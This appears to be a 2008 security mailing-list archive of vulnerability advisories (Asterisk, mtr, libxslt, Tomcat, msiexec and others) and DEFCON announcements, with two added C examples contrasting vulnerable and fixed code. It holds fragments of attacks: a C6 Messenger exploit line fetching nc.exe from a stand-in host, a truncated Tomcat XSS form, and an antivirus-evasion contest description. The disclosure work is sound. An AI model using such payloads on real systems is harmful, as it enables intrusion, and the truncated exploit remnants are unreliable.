AST-2008-008: Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

2008-06-03 Thread Asterisk Security Team
   Asterisk Project Security Advisory - AST-2008-008

   +--------------------+----------------------------------------------------+
   | Product            | Asterisk                                           |
   +--------------------+----------------------------------------------------+
   | Summary            | Remote Crash Vulnerability in SIP channel driver   |
   |                    | when run in pedantic mode                          |
   +--------------------+----------------------------------------------------+
   | Nature of Advisory | Denial of Service                                  |
   +--------------------+----------------------------------------------------+
   | Susceptibility     | Remote Unauthenticated Sessions                    |
   +--------------------+----------------------------------------------------+
   | Severity           | Critical                                           |
   +--------------------+----------------------------------------------------+
   | Exploits Known     | No                                                 |
   +--------------------+----------------------------------------------------+
   | Reported On        | May 8, 2008                                        |
   +--------------------+----------------------------------------------------+
   | Reported By        | Hooi Ng (bugs.digium.com user hooi)                |
   +--------------------+----------------------------------------------------+
   | Posted On          | May 8, 2008                                        |
   +--------------------+----------------------------------------------------+
   | Last Updated On    | June 3, 2008                                       |
   +--------------------+----------------------------------------------------+
   | Advisory Contact   | Joshua Colp <[EMAIL PROTECTED]>                    |
   +--------------------+----------------------------------------------------+
   | CVE Name           | CVE-2008-2119                                      |
   +--------------------+----------------------------------------------------+

   +-------------+----------------------------------------------------------+
   | Description | During pedantic SIP processing the From header value is  |
   |             | passed to the ast_uri_decode function to be decoded. In  |
   |             | two instances it is possible for the code to cause a     |
   |             | crash as the From header value is not checked to be      |
   |             | non-NULL before being passed to the function.            |
   +-------------+----------------------------------------------------------+

   +-------------+----------------------------------------------------------+
   | Resolution  | The From header value is now copied into a buffer before |
   |             | being passed to the ast_uri_decode function if pedantic  |
   |             | is enabled and in another instance it is checked to be   |
   |             | non-NULL before being passed.                            |
   +-------------+----------------------------------------------------------+

   Affected Versions

   +----------------------------------+----------------+--------------------------------+
   | Product                          | Release Series |                                |
   +----------------------------------+----------------+--------------------------------+
   | Asterisk Open Source             | 1.0.x          | All versions                   |
   +----------------------------------+----------------+--------------------------------+
   | Asterisk Open Source             | 1.2.x          | All versions prior to 1.2.29   |
   +----------------------------------+----------------+--------------------------------+
   | Asterisk Open Source             | 1.4.x          | Not Affected                   |
   +----------------------------------+----------------+--------------------------------+
   | Asterisk Business Edition        | A.x.x          | All versions                   |
   +----------------------------------+----------------+--------------------------------+
   | Asterisk Business Edition        | B.x.x          | All versions prior to B.2.5.3  |
   +----------------------------------+----------------+--------------------------------+
   | Asterisk Business Edition        | C.x.x          | Not Affected                   |
   +----------------------------------+----------------+--------------------------------+
   | AsteriskNOW                      | 1.0.x          | Not Affected                   |
   +----------------------------------+----------------+--------------------------------+
   | Asterisk Appliance Developer Kit | 0.x.x          | Not Affected                   |
   +----------------------------------+----------------+--------------------------------+
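The defect class the advisory describes (a possibly-NULL header value handed straight to an in-place decoder) and the shape of its resolution (reject NULL, copy into a bounded buffer, decode the copy), as an added C example. This is not Asterisk's code: uri_decode_inplace is a stand-in written here for ast_uri_decode, the function names from_decode_unchecked and from_decode_checked are chosen for this illustration, and the From values are constructed samples.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for ast_uri_decode (not Asterisk's code): percent-decode s in
 * place and return the decoded length. Malformed escapes such as "%4" or
 * "%zz" are left untouched. s is dereferenced unconditionally, which is
 * exactly why the caller must never hand it a NULL pointer. */
static size_t uri_decode_inplace(char *s)
{
    char *r = s, *w = s;
    while (*r != '\0') {
        if (r[0] == '%' && isxdigit((unsigned char)r[1]) &&
            isxdigit((unsigned char)r[2])) {
            char hex[3] = { r[1], r[2], '\0' };
            *w++ = (char)strtol(hex, NULL, 16);
            r += 3;
        } else {
            *w++ = *r++;
        }
    }
    *w = '\0';
    return (size_t)(w - s);
}

/* Defective pattern from the advisory: the header value goes straight to the
 * decoder with no NULL check, so a request whose From value was never set
 * dereferences NULL and takes the whole process down. */
static void from_decode_unchecked(char *from)
{
    uri_decode_inplace(from);
}

/* Hardened pattern mirroring the advisory's resolution: refuse a missing
 * value, copy it into a caller-owned bounded buffer, decode the copy.
 * Returns 0 on success, -1 when from is NULL or does not fit in out. */
static int from_decode_checked(const char *from, char *out, size_t outlen)
{
    if (from == NULL || out == NULL || outlen == 0)
        return -1;
    size_t len = strlen(from);
    if (len >= outlen)
        return -1;                 /* would truncate; treat as a bad header */
    memcpy(out, from, len + 1);    /* includes the terminator */
    uri_decode_inplace(out);
    return 0;
}

int main(void)
{
    /* Constructed sample From values; the NULL entry models the crash case. */
    const char *samples[] = {
        "%22Alice%22 <sip:alice@example.com>",
        "<sip:bob@example.com>",
        NULL,
    };
    char buf[128];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        if (from_decode_checked(samples[i], buf, sizeof buf) == 0)
            printf("decoded : %s\n", buf);
        else
            printf("rejected: From value missing or too long\n");
    }
    /* The unchecked variant is only safe when the value is known to exist. */
    char present[] = "%3Csip:carol@example.com%3E";
    from_decode_unchecked(present);
    printf("unchecked on a present value: %s\n", present);
    return 0;
}
```

The checked variant returns an error instead of crashing when the value is absent, and the bounded copy means the decoder never writes into memory the caller did not size; the unchecked variant is kept only to show the pattern the advisory's fix removes.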

AccessMe Tool Release

2008-06-03 Thread Oliver Lavery
Hello, 

Security Compass is proud to announce the release of AccessMe, the latest
addition to our ExploitMe series of free penetration testing add-ons for
Mozilla Firefox.

This preliminary release of AccessMe expands the series with powerful
functionality for testing the access control and session management
mechanisms of web applications,  including:

- Invalid HTTP method attacks
- Bypassing access control using HTTP HEAD
- Session dropping

We're releasing this tool as open-source under the GPLv3, and hope it will
assist penetration testers, QA staff, and developers in detecting and
eliminating common security vulnerabilities in today's web applications.

Please visit http://www.securitycompass.com/ to download AccessMe, and all
of our other free penetration testing tools.

Regards,
Oliver Lavery
Security Compass



[NSG 03-06-2008] C6 Messenger Installation Url DownloaderActiveX Control Remote Download & Execute Exploit

2008-06-03 Thread ipsdix

http://yoursite.com/nc.exe";>

London DEFCON June meet - DC4420 - Thursday 5th June

2008-06-03 Thread Major Malfunction

hey all,

it's that time of the month again!

so we present to you : DC4420 June @ the Glassblower:

- Wargames!

   The winning team will be presenting 'how they did it' -
   (note: everyone should buy them Guinness. Schwag will be awarded as well)


- Last-minute hastily-put-together presentation on locks.
  autom8ton - bring your locks/picks and we'll have a workshop afterwards.

-  New speaker! Alex talking about Social engineering

- 5 minute slot - a demo by Richard. (demo is such a lovely term for a 
talk, could be anything!)


- MM will be calling for participation in an "art" project. If you have 
camera equipment, film making skills, editing skills, music/dubbing 
skills, please step forward! This is going to be fun, and to do with 
RFID. It's entitled "PARFID: Passive Aggressive RFID. RFIDIOts fight back!".


Also, please get in touch with me or alien if you would like to talk at 
the July meeting, June is now full :-)


There will be workshops after the talks - please bring locks + picks if 
you have them (and are legally entitled to carry them!) :P


Where?

Upstairs @ Glassblower 
http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z=16&iwloc=addr

42 Glasshouse St, Piccadilly, W 1B 5JY

doors open from 7, speaking starts from  7.30 - please try and be prompt 
as some people need to go early to get trains back out of London.


we have private use of the whole of the upstairs till close.

real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 
'Doombar'. other stuff on draught : Guinness, Staropramen, Hoegaarden, 
Leffe. even more stuff on draught : Becks, Fosters, 1664


food menu is extensive and most importantly : they do Pie.

as always, details & discussions here:

  http://dc4420.org

cheers,
MM
--
"In DEFCON, we have no names..." errr... well, we do... but silly ones...


[ GLSA 200806-01 ] mtr: Stack-based buffer overflow

2008-06-03 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200806-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: mtr: Stack-based buffer overflow
      Date: June 03, 2008
      Bugs: #223017
        ID: 200806-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A stack-based buffer overflow was found in mtr, possibly resulting in
the execution of arbitrary code.

Background
==========

mtr combines the functionality of the 'traceroute' and 'ping' programs
in a single network diagnostic tool.

Affected packages
=================

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /          Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/mtr                 < 0.73-r1              >= 0.73-r1

Description
===========

Adam Zabrocki reported a boundary error within the split_redraw()
function in the file split.c, possibly leading to a stack-based buffer
overflow.

Impact
======

A remote attacker could use a specially crafted resolved hostname to
execute arbitrary code with root privileges. However, it is required
that the attacker controls the DNS server used by the victim, and that
the "-p" (or "--split") command line option is used.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All mtr users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/mtr-0.73-r1"

References
==========

  [ 1 ] CVE-2008-2357
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2357

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200806-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





RE: Windows Installer msiexec GUID Buffer Overflow

2008-06-03 Thread Thor (Hammer of God)
So, the "possible code execution" would run code in the context of the user who 
was running msiexec.exe?  If you are going to get them to run code to exploit 
the "vulnerability," wouldn't it be more efficient to just get them to run 
whatever resultant code you were trying to run in the first place?

t

> -Original Message-
> From: Patrick Webster [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, June 03, 2008 3:13 AM
> To: bugtraq@securityfocus.com
> Subject: Windows Installer msiexec GUID Buffer Overflow
> 
> aushack.com - Vulnerability Advisory
> ---
> Release Date:
>  03-Jun-2008
> 
> Software:
>  Microsoft Corporation - Windows Installer (msiexec.exe)
>  http://www.microsoft.com/
> 
>  "Microsoft Windows Installer is an installation and configuration
> service that
>   reduces the total cost of ownership. Windows Installer enables
> customers to
>   provide better corporate deployment and provides a standard format
> for
>   component management."
> 
> Versions tested:
>  4.5.6001.22159 and 3.1.4000.1823 are vulnerable.
>  Other versions are untested but assumed.
> 
> Vulnerability discovered:
> 
>  Unicode based stack overflow.
> 
> Vulnerability impact:
> 
>  Moderate - Code execution is possible but difficult due to the unicode
>   conversion. Some ActiveX controls pass the GUID, so it may
>   be exploited remotely. Other avenues may also be present.
> 
> Vulnerability information:
> 
>  By specifying an overly long Globally Unique Identifier (GUID),
>  it is possible to overwrite the stack and SE Handler.
> 
>  Example:
> 
>   msiexec.exe /x {}
> 
> References:
>  aushack.com advisory
>  http://www.aushack.com/200806-msiexec.txt
> 
> Credit:
>  Patrick Webster ( [EMAIL PROTECTED] )
> 
> Disclosure timeline:
>  03-Jun-2008 - Disclosure.
> 
> EOF


[ GLSA 200806-02 ] libxslt: Execution of arbitrary code

2008-06-03 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200806-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libxslt: Execution of arbitrary code
      Date: June 03, 2008
      Bugs: #222499
        ID: 200806-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability was found in libxslt, possibly resulting in the
execution of arbitrary code and Denial of Service.

Background
==========

Libxslt is the XSLT C library developed for the GNOME project. XSLT
itself is an XML language to define transformations for XML.

Affected packages
=================

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /          Unaffected
    -------------------------------------------------------------------
  1  dev-libs/libxslt                  < 1.1.24               >= 1.1.24

Description
===========

Anthony de Almeida Lopes reported a vulnerability in libxslt when
handling XSL style-sheet files, which could be exploited to trigger the
use of uninitialized memory, e.g. in a call to "free()".

Impact
======

A remote attacker could entice a user or automated system to process an
XML file using a specially crafted XSL transformation file, possibly
resulting in the execution of arbitrary code or a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libxslt users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxslt-1.1.24"

References
==========

  [ 1 ] CVE-2008-1767
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1767

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200806-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





Re: Windows Installer msiexec GUID Buffer Overflow

2008-06-03 Thread 0xjbrown41
Other flags may be vulnerable as well. Microsoft has a thing for unicode.


[security bulletin] HPSBST02312 SSRT071428 rev.1 - HP StorageWorks Storage Mirroring Software, Remote Execution of Arbitrary Code

2008-06-03 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01362558
Version: 1

HPSBST02312 SSRT071428 rev.1 - HP StorageWorks Storage Mirroring Software, 
Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2008-06-02
Last Updated: 2008-06-02

Potential Security Impact: Remote execution of arbitrary code. 

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP StorageWorks 
Storage Mirroring (SWSM) software. This vulnerability could allow remote 
execution of arbitrary code. 

References: CVE-2008-1661. 

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP StorageWorks Storage Mirroring software v4.5 Service Pack 1. 

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2008-1661    (AV:N/AC:M/Au:N/C:C/I:C/A:C)       9.3
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.


The Hewlett-Packard Company thanks Titon of BastardLabs working with
TippingPoint's Zero Day Initiative for reporting this vulnerability to
[EMAIL PROTECTED].

RESOLUTION

To resolve this vulnerability download HP StorageWorks Storage Mirroring 
software v4.5 Service Pack 2 (SP2) from Double-Take at the following URL: 
http://www.doubletake.com/products/double-take/default.aspx 

Note: Double-Take v5.0 (HP StorageWorks Storage Mirroring software v5.0) is now 
available for download from the above URL; this version includes the resolution 
to the stated vulnerability as well as a broad range of new features and 
improvements. 


PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 2 June 2008 Initial release 

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement."

©Copyright 2008 Hewlett-Packard Development Company, L.P.

[SECURITY] [DSA 1591-1] New libvorbis packages fix several vulnerabilities

2008-06-03 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA-1591-1  [EMAIL PROTECTED]
http://www.debian.org/security/  Thijs Kinkhorst
June 03, 2008 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: libvorbis
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)  : CVE-2008-1419 CVE-2008-1420 CVE-2008-1423
Debian Bug : 482518

Several local (remote) vulnerabilities have been discovered in libvorbis,
a library for the Vorbis general-purpose compressed audio codec. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-1419

libvorbis does not properly handle a zero value which allows remote
attackers to cause a denial of service (crash or infinite loop) or
trigger an integer overflow.

CVE-2008-1420

Integer overflow in libvorbis allows remote attackers to execute
arbitrary code via a crafted OGG file, which triggers a heap overflow.

CVE-2008-1423

Integer overflow in libvorbis allows remote attackers to cause a denial
of service (crash) or execute arbitrary code via a crafted OGG file
which triggers a heap overflow.

For the stable distribution (etch), these problems have been fixed in version
1.1.2.dfsg-1.4.

For the unstable distribution (sid), these problems have been fixed in
version 1.2.0.dfsg-3.1. 

We recommend that you upgrade your libvorbis package.

Upgrade instructions
- -------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ------------------------------

Source archives:

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg-1.4.dsc
Size/MD5 checksum:  787 2f0bfd28fb368c43c56332e7de7a2e3d
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg.orig.tar.gz
Size/MD5 checksum:  1312540 44cf09fef7f78e7c6ba7dd63b6137412
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg-1.4.diff.gz
Size/MD5 checksum:15782 62527e6adcff1dca42018a0252b19b91

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_alpha.deb
Size/MD5 checksum:94500 edb2728b48cd6fc0357f62a7dc8fca5c
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_alpha.deb
Size/MD5 checksum:   110468 8273babee8a08c373671b468469b2ede
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_alpha.deb
Size/MD5 checksum:19202 925dfba3f212e8b69c760c433b119716
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_alpha.deb
Size/MD5 checksum:   494958 0052fe78f4be43cb9a7f42ea2b25f7fe

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_amd64.deb
Size/MD5 checksum:17790 f49da89a8b972614687f3a5e2f6c5bac
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_amd64.deb
Size/MD5 checksum:93498 241499415b96f3e348d1ec9c66a45981
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_amd64.deb
Size/MD5 checksum:   101508 63e1e8392876a822dc664e21b19e0185
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_amd64.deb
Size/MD5 checksum:   468670 8c6c80eb7b8e7f8b49be1447357ebce1

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_arm.deb
Size/MD5 checksum:75744 03dad28341cde24fbbfd20444bf346c2
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_arm.deb
Size/MD5 checksum:18528 508cb939f65a367447c44add9dd8c11a
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_arm.deb
Size/MD5 checksum:98190 a09c2d3021f7b9d2d9b2bf04b2d30957
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_arm.deb
Size/MD5 checksum:   458578 6dcadbb28c56a0a9368bfcd67b28d3fa

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_hppa.deb
Size/MD5 checksum:   483196 0435784553fb2b9c08c915da58c3c7e1
  
http://security.debian.org/pool/updates/main/libv/libv

Windows Installer msiexec GUID Buffer Overflow

2008-06-03 Thread Patrick Webster
aushack.com - Vulnerability Advisory
---
Release Date:
 03-Jun-2008

Software:
 Microsoft Corporation - Windows Installer (msiexec.exe)
 http://www.microsoft.com/

 "Microsoft Windows Installer is an installation and configuration service that
  reduces the total cost of ownership. Windows Installer enables customers to
  provide better corporate deployment and provides a standard format for
  component management."

Versions tested:
 4.5.6001.22159 and 3.1.4000.1823 are vulnerable.
 Other versions are untested but assumed.

Vulnerability discovered:

 Unicode based stack overflow.

Vulnerability impact:

 Moderate - Code execution is possible but difficult due to the unicode
conversion. Some ActiveX controls pass the GUID, so it may
be exploited remotely. Other avenues may also be present.

Vulnerability information:

 By specifying an overly long Globally Unique Identifier (GUID),
 it is possible to overwrite the stack and SE Handler.

 Example:

  msiexec.exe /x {}

References:
 aushack.com advisory
 http://www.aushack.com/200806-msiexec.txt

Credit:
 Patrick Webster ( [EMAIL PROTECTED] )

Disclosure timeline:
 03-Jun-2008 - Disclosure.

EOF


[SECURITY] CVE-2008-1947: Tomcat host-manager XSS vulnerability

2008-06-03 Thread Mark Thomas


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2008-1947: Tomcat host-manager XSS vulnerability

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
Tomcat 5.5.9 to 5.5.26
Tomcat 6.0.0 to 6.0.16
This issue has been fixed in the source repositories for each version and
will be included in 5.5.27 and 6.0.17. It is anticipated that these
versions will be released shortly.

Description:
The user supplied hostname attribute is not filtered before being included
in the output.

Mitigation:
Do not visit untrusted sites whilst logged in to the host-manager
application and log out (close the browser) once finished with the
host-manager.

Example:
Assume that, after logging in, the victim was led to a malicious web
server with the following file installed.
http://localhost:8080/host-manager/html/add"; method="get">
~  
~  
~  


Credit:
These issues were discovered by Petr Splichal of RedHat.

References:
http://tomcat.apache.org/security.html

Mark Thomas
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkhEahEACgkQb7IeiTPGAkOQggCgirNfHSCkMDhcEzG6Ig1N0WzP
qesAoKXePHeBKaB0VzeBoowW5kvZpBQx
=4nQe
-END PGP SIGNATURE-
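The defect class in this advisory, a user-supplied value reflected into HTML output without filtering, beside the output-encoding fix that closes it, as an added example that is not Tomcat's own code. It is written in C to match the other example on this page; html_escape, reflect_unfiltered and reflect_filtered are names chosen here, and the hostname values are constructed samples.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Escape the five HTML-significant characters so a value can be placed in
 * element text or a double- or single-quoted attribute without changing the
 * page's structure. Returns the escaped length, or -1 if outlen is too small
 * (out is then NUL-terminated at the point where space ran out).
 * Stand-alone illustration, not Tomcat's filter code. */
static long html_escape(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    if (in == NULL || out == NULL || outlen == 0)
        return -1;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char one[2] = { (char)*p, '\0' };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (n + rl >= outlen) {        /* keep room for the terminator */
            out[n] = '\0';
            return -1;
        }
        memcpy(out + n, rep, rl);
        n += rl;
    }
    out[n] = '\0';
    return (long)n;
}

/* Vulnerable pattern: the hostname is dropped into the page verbatim, so any
 * markup it carries becomes part of the page. Writes into out, returns out. */
static const char *reflect_unfiltered(const char *hostname, char *out, size_t outlen)
{
    snprintf(out, outlen, "<td>%s</td>", hostname);
    return out;
}

/* Hardened pattern: escape first, and refuse to render rather than emit a
 * silently truncated value. Returns NULL when escaping does not fit. */
static const char *reflect_filtered(const char *hostname, char *out, size_t outlen)
{
    char esc[512];
    if (html_escape(hostname, esc, sizeof esc) < 0)
        return NULL;
    snprintf(out, outlen, "<td>%s</td>", esc);
    return out;
}

int main(void)
{
    /* Constructed hostname values; the second carries markup characters. */
    const char *names[] = { "host1.example.com", "my<host>\"name\"" };
    char line[256];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        printf("unfiltered: %s\n", reflect_unfiltered(names[i], line, sizeof line));
        const char *safe = reflect_filtered(names[i], line, sizeof line);
        printf("filtered  : %s\n", safe ? safe : "(refused: value too long)");
    }
    return 0;
}
```

The escaper covers the attribute case as well as element text, which matters here because the advisory's form submits the hostname into an attribute-bearing management page; the length check means an oversized value fails closed instead of producing a half-escaped string.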


Advisory: Xerox Workaround & planned patch

2008-06-03 Thread suzanne . hawley
Note:

Xerox has released a minimal-impact workaround for this issue for DocuShare 
4.x, 5.x, and 6.x. 


The workaround is detailed at 


https://docushare.xerox.com/doug/dsweb/View/Collection-7503 


We will also be releasing a patch to restore full functionality. Please refer 
to the above collection, or use your DocuShare support contact, for further 
information. 


Thank you to Doz and HackersCenter for finding and reporting this issue. 


Leigh L. Klotz, Jr. 

Xerox Corporation


(Submitted by S.Hawley, Xerox)




DEFCON 16 Updates - Get involved!

2008-06-03 Thread The Dark Tangent
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

DEFCON 16 Updates!

As DEFCON 16 gets closer its awesome powers, much like a kraken summoned by
Dethklok, continue to grow.

How do you become friends with a kraken? You get to know it. Have a beer.
Below are various ways you can get involved with DEFCON 16 contests and
events. The Call for Papers is closed, and selections are being announced
all this week, so it is a bit too late to speak, but not too late to get
involved.
https://www.defcon.org/html/defcon-16/dc-16-speakers.html

Artwork Contest:
Artwork Contest is now underway! The first batch of submissions is up at:
https://pics.defcon.org/showgallery.php?cat=532 

Entries will be posted as they are received, and will be accepted through
June 15th. There will then be a vote on pics.defcon.org for the viewers
choice award. You must have a forums/pics account to vote, so go sign up!
The Official rules, prizes, and entry information can be found at:
http://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html

Black and White Ball:
A Call for Talent, DJs, and Bands has been issued by the organizers of the
B&W Ball, which you may find at:
https://forum.defcon.org/showthread.php?t=9266
There is also currently discussion on the DEFCON Forums about a new theme
for the B&W Ball, which you can find on this thread:
https://forum.defcon.org/showthread.php?t=9142

Capture the Flag
Quals for this year's CTF are complete. Check out the
results here:
https://forum.defcon.org/forumdisplay.php?f=356 
http://www.kenshoto.com/

LosT @ Con Mystery Challenge:
LosT is working his devious magic again with the LosT @ Con Mystery
Challenge! There is a Pre-Reg Challenge currently open, and you can find
instructions at:
https://forum.defcon.org/showthread.php?t=9357.  
http://www.mysterychallenge.org

New for DEFCON 16

Buzzword Survivor:
New Contest for DEFCON 16.  Check out discussion of this contest as it
develops at https://forum.defcon.org/forumdisplay.php?f=352

Hardware Hacking Village:
To state it most simply, it's a way to give all the Defcon attendees that
like electronics a place to play. It's also intended to be a place for
everyone that thinks "Wow! That looks cool! I wish I knew how to do that!".
It's also going to be the headquarters for Joe Grand (kingpin) so he can
talk about hacking past badges and such. It should be a great place to hang
out. Find more info on the forums at
https://forum.defcon.org/showthread.php?t=9295.

The Race to Zero:
This one is generating a whole lot of buzz in the press. The Race to Zero
involves contestants being given a sample set of viruses and malcode to
modify and upload through the contest portal. The portal passes the modified
samples through a number of antivirus engines and determines if the sample
is a known threat. The first team or individual to pass their sample past
all antivirus engines undetected wins that round. Each round increases in
complexity as the contest progresses. Further details are available here:
http://www.racetozero.net/

